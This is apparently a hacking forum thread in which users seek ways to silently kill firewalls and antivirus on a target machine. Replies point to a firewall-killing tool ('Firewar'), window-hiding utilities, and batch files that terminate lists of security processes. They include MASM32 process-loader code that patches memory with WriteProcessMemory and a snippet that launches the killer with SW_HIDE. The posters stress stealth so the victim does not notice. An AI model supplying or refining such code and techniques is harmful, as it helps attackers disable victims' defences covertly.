I Found exactly what I need it will kill all firewalls with the icon still downstairs. Anyway what your now drooling about is "Firewar", search google. The problem is when executed it brings up a little screen saying whats its doing; why this was added I dont know. So how do I get rid of it or hide it?

try and use HideRun.exe which you'll find here

http://www.governmentsecurity.org/forum/in...=15&#entry12332

NOPE, I have tried both hidden32.exe hiderun.exe and ghost.exe; none will hide this app. I think the author doesnt want you to use it for this purpose but the exact purpose im trying to use it for he describes as a use on his site!

maybe a good resource editor will do the trick ?

give me a couple days...ill have it hexed

hmm have you tested it with the HideRun.exe from the link i gave ya above coz when i run it on my box (running xp pro atm) it hides the gui,
tho it flickers on for a split second when its started.

ps. i have ZoneAlarm Pro 4.5.538.001 installed and firewar.exe is telling me that its not running have you had any luck with this proggy and if so what firewall/av did it work on ??


SkitZZ

I am also looking for something like this. Looking for it more to be in the form of a bat file. But something that kills 300+ proggies

This is one of the simplest things you can do..
the program most likely runs hidden but the window shows up you can patch it to run with SW_HIDE u can also nop out the call to the messagebox or window
You can make a bootloader if it is the main program that shows you.
use your immaganation
---code starts here----
.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib

.data
FileName db "c:\crackme.exe",0
loaderr db "Could not load process",0
gonogo db "we are a go no go for launch",0
NewCapt db "paradox is..",0

Startup STARTUPINFO <>
processinfo PROCESS_INFORMATION <>

.data?
hInstance HINSTANCE ?
byteswritten dd ?

.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke CreateProcess, addr FileName,NULL,NULL,NULL,NULL,CREATE_SUSPENDED,NULL,NULL,addr Startup, addr processinfo
.if eax == NULL
invoke MessageBox,NULL,addr loaderr,NULL, MB_ICONEXCLAMATION
.else
invoke MessageBox,NULL, addr gonogo,NULL, MB_OK
invoke WriteProcessMemory, processinfo.hProcess, 004050FCh, addr NewCapt,sizeof NewCapt, byteswritten
invoke ResumeThread, processinfo.hThread
.endif
push eax
call ExitProcess
end start
--- end code snippet----
just use masm32 to compile it and of course edit the offsets etc to write to
just a simple example of how a loader works
but yeah just hex edit so it firewar pushes sw_hide to the window so it wont be seen simple but effecitve

Doing a batch file is just as good, there are lists of process and service names of AV's and firewalls floating around. Chuck them in a batch, run it and you're set. No GUI program needed.

yes, I am looking for that list. Lemme know if you find a good one plz. Im about to hit google.

here m8

You can test Firedeamon too, he have many functions.
The official page here: http://www.firedaemon.com/

Thanks exist

Yes much more stealthy than just killing thru a bat script. Also on XP it pops up the command window and that looks bad too. And even if it flickers thats not good enuf. Also, If ANYONE has a list of just FIREWALL services or exes PLEASE SEND IT TO ME! OCKid562@hotmail.com

@Exploited, when thats done may I have a copy.

if you have VisualBasic installed there, here is a tip to create your own "HideRun.exe" in 2 seconds

or u can use an exe of your own ...

Procedure kill()
ShellExecute_(0,"open","firewar.exe",0,0,#SW_HIDE)
EndProcedure

C Langage must closed to this , i tested the little exe i made and it works perfectly